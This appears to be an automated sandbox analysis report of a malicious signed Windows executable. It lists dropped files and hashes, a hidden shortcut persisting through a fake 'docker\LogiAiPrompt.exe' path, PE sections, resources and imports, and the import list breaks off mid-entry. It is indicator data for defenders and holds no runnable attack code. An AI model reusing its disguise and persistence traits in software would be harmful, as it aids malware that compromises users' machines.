Preview:	.=.W.* ..']&.'.^S0.,AQ(,L.\-].W.X." M../Q!..@.0.Q5Z$Z).\\<8WM_;.X!..^7.7U<..S...].?-S[[.Y1U9^3_3R? .F....^...7... 6.A"\/...6.$$..Z^.7"..!9..><.N.!..".......-6%...5....N-.....V..+_.+\V.W+(.<\&.........2.1O.9..-0..0?..+.0.4..T6P.L.<.F.0.Z.. U&#<G0..V.._M5(.[..^]Q..U...GVS.XW/+R.."SRQ-]...S'+/Y.-&^<..R.>.F.P..U._.....S.&A.&..X:3.+T6.6P......R.Y....N.)...R.."87.....R-,.3$3N.V..^.V.3._..?4.+"(.?]..-....4_.>Q.O.....%..-9/.).4....TRP.L...F.[.W.(.R84,G^Z.\5.)R+.<[R..@2..R .._...X4?PM../P.1._V\>Y.VTZ-.=^U.!S.;SY.6._^.>L..W.W.'.!X..:.5FT'_.)."...6.QP..4^+...)..2.C .).-=U.=...!....#%....C..+.;V..25].>.......4&Z..+...8$....B".V..&W.-W7..$..!..S.S$A.!2L).TX55-V.. [<..G..._.\.P...Y..8@ XQQ..QY.%;X...M_7U[.W^Z.Z!P.-.S=3.]<$4S^.#Y1&5^+&.R."SF-...5_%.V>W....A./....-..&..P...;&...)..2.2N.....3"..1......"'..2.#N.=(.(9(.>>,....TP..RX5.[<...9..5.5O.\^.?...+%.#.?.P..T6.0LV-.F.).]..6[9.UG.S+_0>S[.).Y7.[@4Y.Q5.RY..Y[.#.M%47X..8X.^.W]'.S.4"].!(S>].Y.&,^".?R$Z4F.........S.!..AP?1.8...*"7.Q'!..&W..,?.1.6N_?.

C:\Users\user\AppData\Local\Temp\romr

Download File

Process:	C:\Windows\SysWOW64\more.com
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Oct 4 11:02:34 2023, mtime=Mon Nov 25 06:32:11 2024, atime=Mon Nov 25 06:32:08 2024, length=21120968, window=hide
Category:	dropped
Size (bytes):	894
Entropy (8bit):	5.0913841888563285
Encrypted:	false
SSDEEP:	12:89YNsW4Xl0WCl7dY//jsML4W87iK+6X0zK50qAjAo8rHq8UJPyQ9NnBmV:89YNWXtm7+YeHciKOKmqUADQAQTBm
MD5:	2B87B2A0832CE9F5A594018ED0B5B97E
SHA1:	6E9ACD6DB84EBFBE724C633791F4942DA1E2A34C
SHA-256:	997C8DAA35C1DBA1C7AC2F6183E29CD149D202CC4A6FA8CBAB658FC26C673C9F
SHA-512:	38220BD22F4BF4D962C051DDB9561946DF675037122E61143FCDBA21A69F540455534BA86A0250D7801CD0D14222A0DABD0B150BC918AA6DCC95B57289F55F1B
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...........^$.?..f .".?...GB.......................:..DG..Yr?.D..U..k0.&...&......vk.v.....w...?..h..-.?......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^yY.<...........................%..A.p.p.D.a.t.a...B.V.1.....yY.<..Roaming.@......CW.^yY.<..........................B...R.o.a.m.i.n.g.....T.1.....yY.<..docker..>......yY.<yY.<..........................Pdq.d.o.c.k.e.r.....n.2..GB.yY.< .LOGIAI~1.EXE..R......DWR`yY.<.............................L.o.g.i.A.i.P.r.o.m.p.t...e.x.e.......e...............-.......d............U.......C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe..%.....\.....\.R.o.a.m.i.n.g.\.d.o.c.k.e.r.\.L.o.g.i.A.i.P.r.o.m.p.t...e.x.e.`.......X.......841618...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\yrpfhpihdypx

Download File

Process:	C:\Windows\SysWOW64\more.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7652352
Entropy (8bit):	6.189526325831481
Encrypted:	false
SSDEEP:	98304:4xD6PvPXh9+WHw6vySOuGGeXlufF3hSw6:A6GAfF3hZ6
MD5:	7F4D907F2E049203300A3E4FF50C0F0F
SHA1:	C48A6C89000F24EF642F1FD7E96E5A00AA590B0A
SHA-256:	1FDBBD54D17B341CEB3DFBD230693633CBE12B4CED5C5F60562C07629426FA2E
SHA-512:	076CA22C047706183A8EF7972CEA33E8FF021CACB82F95B3C035E00BBDF19A75D3357F4CB479BABD02DCC4B76FBFE466B4074A03A3C5DBA67B384B038EE7DE85
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:b..t..............pG.........0........`o...@..........................Px...........@...................................u.^.............................u.....................................................@`o..............................text...CnG......pG................. ..`.rdata....'...G...'..tG.............@..@.data........`o......No.............@....idata..^.....u.......r.............@....reloc........u.......r.............@..B.symtab......0x.......t................Blubvlv.......@x.......t.............@...........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.730975588873266
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	iKhdG3bwZK.exe
File size:	21'120'968 bytes
MD5:	044037796cf2d13eadf0217833d52e65
SHA1:	b2e117be2c836ad18d1edccdd440fe44587b1386
SHA256:	1438fe084b1e9bb3574c99cc44a53e6e1bee6e76a20c9bf2bb62139a70ffa211
SHA512:	07f46cdef3dcf3b0b3207f0ef1585ab31407d0125e757f5610b5555bcd769a95627bc4b16d2a871f8dd916a9e9820c355364db83657ba2fdbcc7708b4c76e285
SSDEEP:	393216:AbsUHRpnmyn4GjMSxQodsMIzmRr+wtrXzzwgCh0IO:PajaSx9dvI6RiCrXzEguO
TLSH:	B5270212B384613AE46F2E3A0877FB14683F7F617A12CE9B66F4198C4F35640693A747
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	983c3db5240e86b0

Static PE Info

General

Entrypoint:	0x95a61c
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6723E648 [Thu Oct 31 20:19:20 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b6e2dc6fda6a433b890df57ef17fcdad

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=SSL.com EV Code Signing Intermediate CA ECC R2, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:	A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
Error Number:	-2146762495
Not Before, Not After	18/11/2024 09:47:36 18/11/2025 09:47:36
Subject Chain	OID.1.3.6.1.4.1.311.60.2.1.3=UA, OID.2.5.4.15=Private Organization, CN=TRADE TRUST LLC, SERIALNUMBER=37058412, O=TRADE TRUST LLC, L=Dnipro, C=UA
Version:	3
Thumbprint MD5:	534B9DBCF3BB2DFA2DAD06DA0709841E
Thumbprint SHA-1:	FEA61825376A364886B5236EFCB3EDD1B23E9441
Thumbprint SHA-256:	BD193172C9C4775190F1C906FF5B47D9FB1A342DB35AC211A1A4AC8A9B07B914
Serial:	4C46DCF5B0C4357F05806830DBA932FD

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 009499A0h
call 00007FEE78F04BCDh
push 0095A690h
push 00000000h
push 00000000h
call 00007FEE78F0D6B3h
mov eax, dword ptr [00984788h]
mov eax, dword ptr [eax]
call 00007FEE7915932Bh
mov eax, dword ptr [00984788h]
mov eax, dword ptr [eax]
mov dl, 01h
call 00007FEE7915B091h
mov eax, dword ptr [00984788h]
mov eax, dword ptr [eax]
mov edx, 0095A6C4h
call 00007FEE79158D40h
mov ecx, dword ptr [00983B98h]
mov eax, dword ptr [00984788h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0093DB34h]
call 00007FEE7915930Ch
mov eax, dword ptr [00984788h]
mov eax, dword ptr [eax]
call 00007FEE7915945Ch
call 00007FEE78EFD15Bh
add byte ptr [eax], al
push esi
add byte ptr [edi+00h], cl
push esi
add byte ptr [ebx+00h], dl
dec edi
add byte ptr [esi+00h], al
push esp
add byte ptr [edi+00h], bl
dec edi
add byte ptr [ebx+00h], al
push edx
add byte ptr [edi+00h], bl
push edx
add byte ptr [ebp+00h], ah
popad
add byte ptr [eax+eax+65h], ah
add byte ptr [edx+00h], dh
add byte ptr [eax], al
add byte ptr [eax], al
mov al, 04h
add al, byte ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5b5000	0x9b	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5b0000	0x3fb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62c000	0x8c315f	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1423e20	0x9a8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5b8000	0x73578
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5b7000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5b0b40	0x9c4	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x5b4000	0xe0c	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x555f3c	0x556000	b868ff41d834a79e3ab8f06eab91c354	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x557000	0x36dc	0x3800	0bb7f143683bd16e9cc0acf14f5bbdbe	False	0.5050223214285714	data	6.193752938323276	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x55b000	0x2a124	0x2a200	81ebc99bdbebf50964ed0ee8898cd7c6	False	0.30702313612759646	data	6.082270971376258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x586000	0x2909c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5b0000	0x3fb4	0x4000	43b0270b4d110befabad4bfb8ad09823	False	0.33038330078125	data	5.274523560388854	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x5b4000	0xe0c	0x1000	cbadc12bfca41b6c546ed38a9ab4bf5f	False	0.303466796875	data	4.014333875326934	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x5b5000	0x9b	0x200	6320216ec133fefb1dabea8863b50092	False	0.2578125	data	1.8947667592796267	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x5b6000	0x78	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5b7000	0x5d	0x200	eebedb4f5f94c0780b03eb36a0c3f1fa	False	0.189453125	data	1.370020541144142	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5b8000	0x73548	0x73600	6490c892a1409126502f290121f8feb7	False	0.561054729821235	data	6.7157772047360105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x62c000	0x8c315f	0x8c3200	d18d36d4825d0eefbe8dadb3cdd0625e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
FG	0x62d540	0x7b2860	PNG image data, 1568 x 6367, 8-bit/color RGB, non-interlaced	English	United States	0.9949522018432617
RT_CURSOR	0xddfda0	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0xddfed4	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0xde0008	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0xde013c	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0xde0270	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0xde03a4	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0xde04d8	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0xde060c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0xde07dc	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0xde09c0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0xde0b90	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0xde0d60	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0xde0f30	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0xde1100	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0xde12d0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0xde14a0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0xde1670	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0xde1840	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_BITMAP	0xde1928	0x378	Device independent bitmap graphic, 110 x 14 x 4, image size 784			0.23085585585585586
RT_BITMAP	0xde1ca0	0xd8	Device independent bitmap graphic, 15 x 14 x 4, image size 112, resolution 2834 x 2834 px/m			0.4675925925925926
RT_ICON	0xde1d78	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 2834 x 2834 px/m	English	United States	0.4857050921679439
RT_DIALOG	0xe23da0	0x52	data			0.7682926829268293
RT_DIALOG	0xe23df4	0x52	data			0.7560975609756098
RT_STRING	0xe23e48	0x298	data			0.44126506024096385
RT_STRING	0xe240e0	0x42c	data			0.3202247191011236
RT_STRING	0xe2450c	0x400	data			0.392578125
RT_STRING	0xe2490c	0x4b8	data			0.4105960264900662
RT_STRING	0xe24dc4	0x1200	data			0.1853298611111111
RT_STRING	0xe25fc4	0x8ec	data			0.3397548161120841
RT_STRING	0xe268b0	0x974	data			0.3202479338842975
RT_STRING	0xe27224	0x91c	data			0.26286449399656947
RT_STRING	0xe27b40	0x63c	data			0.33395989974937346
RT_STRING	0xe2817c	0x1f0	data			0.4435483870967742
RT_STRING	0xe2836c	0x5d4	data			0.3445040214477212
RT_STRING	0xe28940	0x39c	data			0.4253246753246753
RT_STRING	0xe28cdc	0x46c	AmigaOS bitmap font "e", fc_YSize 18176, 20992 elements, 2nd "\034", 3rd "x"			0.39664310954063603
RT_STRING	0xe29148	0x320	data			0.42375
RT_STRING	0xe29468	0x4a0	data			0.3918918918918919
RT_STRING	0xe29908	0x38c	data			0.44162995594713655
RT_STRING	0xe29c94	0x398	data			0.3423913043478261
RT_STRING	0xe2a02c	0x2ac	data			0.46345029239766083
RT_STRING	0xe2a2d8	0x308	data			0.41494845360824745
RT_STRING	0xe2a5e0	0x2ec	data			0.42914438502673796
RT_STRING	0xe2a8cc	0x448	data			0.36496350364963503
RT_STRING	0xe2ad14	0x8b4	data			0.3016157989228007
RT_STRING	0xe2b5c8	0xae4	data			0.2309899569583931
RT_STRING	0xe2c0ac	0x4dc	data			0.3729903536977492
RT_STRING	0xe2c588	0x408	data			0.31589147286821706
RT_STRING	0xe2c990	0x3c4	data			0.41804979253112035
RT_STRING	0xe2cd54	0x400	data			0.4140625
RT_STRING	0xe2d154	0x48c	data			0.39261168384879724
RT_STRING	0xe2d5e0	0x1b0	data			0.5532407407407407
RT_STRING	0xe2d790	0xcc	data			0.6666666666666666
RT_STRING	0xe2d85c	0x17c	data			0.5368421052631579
RT_STRING	0xe2d9d8	0x254	data			0.4865771812080537
RT_STRING	0xe2dc2c	0x390	data			0.38706140350877194
RT_STRING	0xe2dfbc	0x3c4	data			0.38070539419087135
RT_STRING	0xe2e380	0x448	data			0.3613138686131387
RT_STRING	0xe2e7c8	0x4c4	data			0.31721311475409836
RT_STRING	0xe2ec8c	0x2c4	data			0.3559322033898305
RT_STRING	0xe2ef50	0x40c	data			0.3996138996138996
RT_STRING	0xe2f35c	0x4b8	data			0.3509933774834437
RT_STRING	0xe2f814	0x698	data			0.3033175355450237
RT_STRING	0xe2feac	0x4a0	data			0.3293918918918919
RT_STRING	0xe3034c	0x394	data			0.38318777292576417
RT_STRING	0xe306e0	0x400	data			0.37890625
RT_STRING	0xe30ae0	0x350	data			0.3867924528301887
RT_STRING	0xe30e30	0xd4	data			0.5283018867924528
RT_STRING	0xe30f04	0xa4	data			0.6524390243902439
RT_STRING	0xe30fa8	0x2dc	data			0.46311475409836067
RT_STRING	0xe31284	0x458	data			0.29856115107913667
RT_STRING	0xe316dc	0x31c	data			0.42462311557788945
RT_STRING	0xe319f8	0x2e8	data			0.3736559139784946
RT_STRING	0xe31ce0	0x34c	data			0.3068720379146919
RT_RCDATA	0xe3202c	0x10	data			1.5
RT_RCDATA	0xe3203c	0x1308	data			0.4755747126436782
RT_RCDATA	0xe33344	0x2	data	English	United States	5.0
RT_RCDATA	0xe33348	0x2355b	Delphi compiled form 'TAboutBox'			0.9526293606760128
RT_RCDATA	0xe568a4	0x2db	Delphi compiled form 'TAdForm'			0.6238030095759234
RT_RCDATA	0xe56b80	0x1b0e3	Delphi compiled form 'TAppForm'			0.7625046246582264
RT_RCDATA	0xe71c64	0x3831	Delphi compiled form 'TFeedbackForm'			0.47493917274939174
RT_RCDATA	0xe75498	0xac6	Delphi compiled form 'TFormPDF'			0.4126178390137781
RT_RCDATA	0xe75f60	0x7cae	Delphi compiled form 'TNagScreen'			0.6467823798483614
RT_RCDATA	0xe7dc10	0xcf8	Delphi compiled form 'TNewVer'			0.563855421686747
RT_RCDATA	0xe7e908	0x6fd6c	Delphi compiled form 'TTranslateForm'			0.15776743536232896
RT_GROUP_CURSOR	0xeee674	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0xeee688	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0xeee69c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xeee6b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xeee6c4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xeee6d8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0xeee6ec	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0xeee700	0x14	data	English	United States	1.1
RT_VERSION	0xeee714	0x340	data	English	United States	0.43149038461538464
RT_MANIFEST	0xeeea54	0x70b	XML 1.0 document, ASCII text, with CRLF, LF line terminators	English	United States	0.403771491957848

Imports

DLL	Import
usp10.dll	ScriptGetProperties, ScriptItemize, ScriptShape, ScriptLayout, ScriptApplyDigitSubstitution
winmm.dll	sndPlaySoundW, timeGetTime
oleacc.dll	LresultFromObject
winspool.drv	DocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
comdlg32.dll	GetSaveFileNameW, GetOpenFileNameW
comctl32.dll	ImageList_GetImageInfo, FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
shell32.dll	DragFinish, DragQueryPoint, DragQueryFileW, DragQueryFileA, DragAcceptFiles, Shell_NotifyIconW, ShellExecuteW
user32.dll	CopyImage, SetMenuItemInfoW, GetMenuItemInfoW, SetCaretPos, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, DestroyCaret, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, GetAsyncKeyState, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, NotifyWinEvent, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, IsCharAlphaW, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateWindowExW, ChildWindowFromPoint, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, AnimateWindow, SetTimer, WindowFromPoint, BeginPaint, DrawStateW, RegisterClipboardFormatW, MapVirtualKeyW, OffsetRect, IsWindowUnicode, DispatchMessageW, CreateAcceleratorTableW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, DrawFocusRect, ReleaseCapture, LoadCursorW, CharLowerA, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, CreateCaret, MonitorFromRect, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, DestroyMenu, SetWindowsHookExW, EmptyClipboard, GetDlgItem, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, SetKeyboardState, GetKeyboardState, ScreenToClient, DrawFrameControl, IsCharAlphaNumericW, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CountClipboardFormats, CallWindowProcW, CloseClipboard, DestroyCursor, CopyIcon, PostQuitMessage, ShowScrollBar, EnableMenuItem, HideCaret, FindWindowExW, MonitorFromPoint, CharUpperA, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, CharNextA, FindWindowW, GetKeyboardLayout, DeleteMenu
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, VerQueryValueA, GetFileVersionInfoW
oleaut32.dll	GetErrorInfo, SysFreeString, VariantClear, VariantInit, SysReAllocStringLen, SafeArrayCreate, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, VariantChangeType, VariantCopyInd
advapi32.dll	RegSetValueExW, RegConnectRegistryW, RegEnumKeyExW, RegLoadKeyW, GetUserNameW, RegDeleteKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegUnLoadKeyW, RegSaveKeyW, RegDeleteValueW, RegReplaceKeyW, RegFlushKey, RegQueryValueExW, RegEnumValueW, RegCloseKey, RegCreateKeyExW, RegRestoreKeyW
netapi32.dll	NetWkstaGetInfo, NetApiBufferFree
msvcrt.dll	isupper, isalpha, isalnum, toupper, memchr, memcmp, memcpy, memset, isprint, isspace, iscntrl, isxdigit, ispunct, isgraph, islower, tolower
winhttp.dll	WinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
kernel32.dll	SetFileAttributesW, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, GetSystemTime, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, SystemTimeToTzSpecificLocalTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, HeapDestroy, FileTimeToDosDateTime, ReadFile, CreateProcessW, HeapSize, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, CopyFileW, MapViewOfFile, CreateMutexW, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, GetFileAttributesExW, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, GlobalFindAtomW, VirtualQueryEx, GlobalFree, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, GlobalLock, VirtualAlloc, GetTempPathW, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, UnmapViewOfFile, GlobalHandle, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, EnumResourceNamesW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, CreatePipe, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, 